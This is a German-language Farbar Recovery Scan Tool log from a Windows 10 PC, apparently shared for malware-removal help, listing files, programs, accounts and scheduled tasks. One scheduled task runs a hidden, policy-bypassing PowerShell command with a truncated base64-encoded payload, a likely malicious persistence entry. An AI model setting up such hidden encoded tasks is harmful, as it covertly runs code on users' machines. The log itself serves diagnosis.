2016-04-14 02:09 - 2015-12-21 22:26 - 00000000 ____D C:\Users\Marcel\AppData\Local\CrashDumps
2016-04-14 01:45 - 2015-08-20 20:55 - 00453280 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2016-04-14 01:25 - 2015-08-21 18:49 - 00000000 ____D C:\Users\Marcel\AppData\Local\JDownloader 2.0
2016-04-13 20:11 - 2015-08-21 21:45 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\TS3Client
2016-04-12 22:36 - 2015-08-20 20:53 - 135176864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-04-12 01:07 - 2015-12-14 02:37 - 00000000 ____D C:\Users\Marcel\AppData\Local\ElevatedDiagnostics
2016-04-11 19:41 - 2015-11-20 18:14 - 00820224 ___SH C:\Users\Marcel\Downloads\Thumbs.db
2016-04-11 13:18 - 2015-08-21 21:44 - 00000000 ____D C:\Program Files\TeamSpeak 3 Client
2016-04-11 12:31 - 2015-08-29 13:21 - 00000000 ____D C:\ProgramData\Blizzard Entertainment
2016-04-11 11:05 - 2015-08-29 13:20 - 00000000 ____D C:\ProgramData\Battle.net
2016-04-10 22:16 - 2015-12-10 21:45 - 00000000 ____D C:\Program Files (x86)\Fallout 4
2016-04-10 22:16 - 2015-12-10 10:37 - 00000000 ____D C:\Users\Marcel\Documents\My Games
2016-04-10 18:23 - 2015-08-21 17:54 - 00000000 ___RD C:\Users\Marcel\Desktop\Studium
2016-04-10 17:31 - 2015-11-03 21:50 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\OBS
2016-04-08 21:39 - 2015-12-08 16:00 - 00002264 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-04-06 20:32 - 2015-10-30 09:26 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-04-06 20:32 - 2015-10-30 09:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-06 09:39 - 2015-12-08 16:06 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-04-06 09:39 - 2015-08-21 00:04 - 00000000 ____D C:\ProgramData\Skype
2016-03-30 03:06 - 2015-08-21 01:28 - 01373680 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2016-03-30 03:06 - 2015-08-21 01:28 - 01316000 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2016-03-30 03:05 - 2015-11-26 15:46 - 00112216 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2016-03-30 03:05 - 2015-08-21 01:28 - 01767248 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2016-03-30 03:05 - 2015-08-21 01:28 - 01756424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2016-03-29 13:56 - 2015-11-06 21:06 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2016-03-27 21:07 - 2015-08-21 18:46 - 00000000 ____D C:\ProgramData\Oracle
2016-03-27 21:07 - 2015-08-21 18:46 - 00000000 ____D C:\Program Files (x86)\Java
2016-03-27 21:06 - 2015-08-21 18:46 - 00097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-03-27 21:06 - 2015-08-21 18:46 - 00000000 ____D C:\Users\Marcel\.oracle_jre_usage
2016-03-25 03:23 - 2016-03-13 17:08 - 12659136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvlddmkm.sys
2016-03-24 15:10 - 2015-08-21 17:55 - 00000000 ____D C:\Users\Marcel\Documents\Anderes
2016-03-22 06:08 - 2016-03-13 17:08 - 20074728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvwgf2umx.dll
2016-03-22 06:08 - 2016-03-13 17:08 - 17328008 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvwgf2um.dll
2016-03-22 06:08 - 2016-03-13 17:08 - 14226672 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvd3dum.dll
2016-03-22 06:08 - 2016-03-13 17:08 - 03685280 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2016-03-22 06:08 - 2016-03-13 17:08 - 03263480 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2016-03-22 06:08 - 2016-03-13 17:08 - 00038050 _____ C:\WINDOWS\system32\nvinfo.pb
2016-03-21 22:01 - 2016-02-05 23:20 - 00056384 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2016-03-19 12:48 - 2015-08-20 21:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-03-16 23:30 - 2016-03-13 17:10 - 00128792 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2016-03-16 23:29 - 2016-03-13 17:10 - 00127768 _____ C:\WINDOWS\system32\vulkan-1.dll
2016-03-16 23:29 - 2016-03-13 17:10 - 00041752 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2016-03-16 23:28 - 2016-03-13 17:10 - 00045848 _____ C:\WINDOWS\system32\vulkaninfo.exe
2016-03-16 20:26 - 2016-03-08 13:10 - 00000000 ____D C:\Program Files (x86)\AdwCleaner

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-08-21 19:02 - 2015-08-21 19:02 - 0000078 _____ () C:\Program Files\Desktop anzeigen.scf
2016-04-15 01:27 - 2016-04-15 01:27 - 0239160 _____ () C:\ProgramData\1460676404.bdinstall.bin
2016-04-15 01:28 - 2016-04-15 01:28 - 0027618 _____ () C:\ProgramData\1460676498.bdinstall.bin
2016-04-14 02:24 - 2016-04-14 02:24 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
C:\Users\Marcel\AppData\Local\Temp\HD-Logger-Native.dll
C:\Users\Marcel\AppData\Local\Temp\HD-ShortcutHandler.dll
C:\Users\Marcel\AppData\Local\Temp\mfc80.dll
C:\Users\Marcel\AppData\Local\Temp\mfc80u.dll
C:\Users\Marcel\AppData\Local\Temp\mfcm80.dll
C:\Users\Marcel\AppData\Local\Temp\mfcm80u.dll
C:\Users\Marcel\AppData\Local\Temp\msvcm80.dll
C:\Users\Marcel\AppData\Local\Temp\msvcp80.dll
C:\Users\Marcel\AppData\Local\Temp\msvcr80.dll
C:\Users\Marcel\AppData\Local\Temp\nvSCPAPI.dll
C:\Users\Marcel\AppData\Local\Temp\nvSCPAPI64.dll
C:\Users\Marcel\AppData\Local\Temp\nvStInst.exe
C:\Users\Marcel\AppData\Local\Temp\OSU.exe
C:\Users\Marcel\AppData\Local\Temp\uninstall.exe
C:\Users\Marcel\AppData\Local\Temp\WtgDriverInstallX.dll
C:\Users\Marcel\AppData\Local\Temp\WTGXMLUtil.dll


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-04-14 12:05

==================== Ende von FRST.txt ============================
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:13-04-2016
durchgeführt von Marcel (2016-04-15 16:46:48)
Gestartet von C:\Users\Marcel\Desktop
Windows 10 Pro Version 1511 (X64) (2016-04-14 00:30:35)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-4129684494-242130120-1963887019-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-4129684494-242130120-1963887019-503 - Limited - Disabled)
Gast (S-1-5-21-4129684494-242130120-1963887019-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-4129684494-242130120-1963887019-1002 - Limited - Enabled)
Marcel (S-1-5-21-4129684494-242130120-1963887019-1000 - Administrator - Enabled) => C:\Users\Marcel

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.010.20060 - Adobe Systems Incorporated)
Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21.0.0.213 - Adobe Systems Incorporated)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 11.2.2261 - AVAST Software)
Cisco AnyConnect Secure Mobility Client  (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 3.1.10010 - Cisco Systems, Inc.)
Cisco AnyConnect Secure Mobility Client (x32 Version: 3.1.10010 - Cisco Systems, Inc.) Hidden
CPUID CPU-Z 1.75 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
Dota 2 (HKLM-x32\...\Steam App 570) (Version:  - Valve)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Earth (HKLM-x32\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1.5.1557 - Google)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1204 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.0.16 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (x32 Version: 10.0.13 - Intel(R) Corporation) Hidden
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader 2 (HKLM-x32\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.82 - Logitech)
Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft Office 365 ProPlus - de-de (HKLM\...\O365ProPlusRetail - de-de) (Version: 15.0.4805.1003 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.42 - mIRC Co. Ltd.)
Mozilla Firefox 42.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 42.0 (x86 de)) (Version: 42.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 42.0.0.5780 - Mozilla)
Mozilla Thunderbird 38.7.2 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 38.7.2 (x86 de)) (Version: 38.7.2 - Mozilla)
NVIDIA 3D Vision Controller-Treiber 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 364.72 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.2.55 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.2.55 - NVIDIA Corporation)
NVIDIA Grafiktreiber 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 364.72 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Office 15 Click-to-Run Extensibility Component (Version: 15.0.4805.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4805.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (Version: 15.0.4805.1003 - Microsoft Corporation) Hidden
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.3.0 - Razer Inc.)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.21.28549 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.86.508.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
SafeZone Stable 1.48.2066.98 (x32 Version: 1.48.2066.98 - Avast Software) Hidden
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.59.0 - Samsung Electronics Co., Ltd.)
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.2.55 - NVIDIA Corporation) Hidden
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Stardew Valley (HKLM\...\Steam App 413150) (Version:  - ConcernedApe)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.17 - TeamSpeak Systems GmbH)
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.56083 - TeamViewer)
Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version:  - Ubisoft)
Unity Web Player (HKU\S-1-5-21-4129684494-242130120-1963887019-1000\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)
Uplay (HKLM-x32\...\Uplay) (Version: 17.1 - Ubisoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.5.1 (HKLM\...\VulkanRT1.0.5.1) (Version: 1.0.5.1 - LunarG, Inc.)
WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-4129684494-242130120-1963887019-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Marcel\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0392B113-CB1F-4753-81D8-38F4F80D1BA8} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {0702D912-EDD7-4E44-AB8F-EB10E373F216} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {0AA38B81-B6AA-4305-8014-A7691A7E427F} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {0E710904-D47C-4C9E-B1B7-77C97E5400E3} - System32\Tasks\SafeZone scheduled Autoupdate 1460676658 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-03-30] (Avast Software)
Task: {12A2BC37-7206-40BC-9B42-09FA40FBDE95} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {2100F15B-6741-4152-BB8D-C452EB2FCA72} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2016-03-15] (Microsoft Corporation)
Task: {2FF5478E-CAB1-4E6D-B347-D43FC90CE7A9} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {36C91B3B-3E29-4046-BFB9-C0E90DF75AEA} - System32\Tasks\{780D0947-7D0E-0C0E-0A11-050B090A1104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (Der Dateneintrag hat 9092 mehr Zeichen).
Task: {3B38C7F7-46A8-4CE5-961B-ED126894FA0C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-28] (Microsoft Corporation)
Task: {3DC3A735-665B-4794-9169-1C4858FDF25A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {45FF4294-15C7-4E36-84DF-433BB916013B} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {49B42BA6-C2FB-4A0F-A4BF-36ADAF8E1083} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {4B5C09EF-730D-4A96-84AE-9ADB8348BA6A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {4BF830CD-C4BD-4925-B53C-51E7F97788C3} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {4EEFF5B4-0565-48D2-927F-30C362E87453} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {5166A363-7931-48FC-BC9E-E5D8C6716917} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {53E4C716-2A3D-4C72-B472-FE0F6AD32C4D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-12] (Google Inc.)
Task: {54C5024E-617B-4F28-A3A4-358EA6378FF4} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {56C40701-F27E-4532-B9D6-214E9FBFD1DD} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {58A159A5-577F-4F8B-AE47-3447DA6600CA} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {5986BFF2-4CF4-4A18-A6D0-8383D788CDF8} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {64722E34-5633-49D4-A31C-1B07429CF782} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {6B721FD7-B147-46CC-89AA-4CDE003151A4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {704B985E-C32C-49CF-B135-91610C9F90F4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {7DFA4822-8430-4542-9208-4FF7AF6AA9FF} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-04-08] (Adobe Systems Incorporated)
Task: {7E7F12BC-DA95-4ACB-9133-D20423347610} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-12] (Google Inc.)
Task: {831ECD9B-3BB3-4DCA-9D77-6CC9E0205CF8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {832BBC50-C964-415B-B07A-77A2C76EC34E} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {8AE7B3F8-AF0A-4D61-AEE9-EC955673A7F1} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {8EA1ABD0-884D-467C-8869-BBF4B85CA7B1} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {962145CB-7B34-403B-8D20-4F44A1ACE044} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {9E28BD01-6532-440F-B473-B2B0E793A7CE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {A275BBAB-75FC-4C21-A128-AC1664BBD644} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-04-15] (AVAST Software)
Task: {AF533C2D-AA74-49A7-81C6-41FD0342922A} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {B21C3D28-9570-409A-9A92-41C352566A5C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-28] (Microsoft Corporation)
Task: {BB22349F-01D4-4C06-B238-EF5EFD1FD79D} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {BE1A8F73-82C2-417F-989A-5C44E1C747F3} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {BEAFC6C5-7829-4533-B6B0-7ACFFE5D66C9} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {C382B24B-4D8D-41E9-8349-E3DEC30F0565} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {C8F20FF5-8298-4F3F-B326-BD9088F1EBFD} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {D4FE2A2A-17F4-4D1D-A828-9D378DB3B3B1} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {D5A1A55C-A6CC-4573-8B9A-4C602F9DD72A} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [2015-09-25] (Intel Corporation)
Task: {D69A5440-DCF5-478B-9814-4B9B0BA8EC20} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-12] (Microsoft Corporation)
Task: {D7866ABB-9911-410A-A2EC-CE9949B12636} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [2015-09-25] (Intel Corporation)
